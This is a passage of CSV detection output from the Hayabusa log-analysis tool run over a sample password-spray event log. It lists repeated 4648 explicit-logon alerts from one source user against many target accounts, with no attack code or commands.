DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 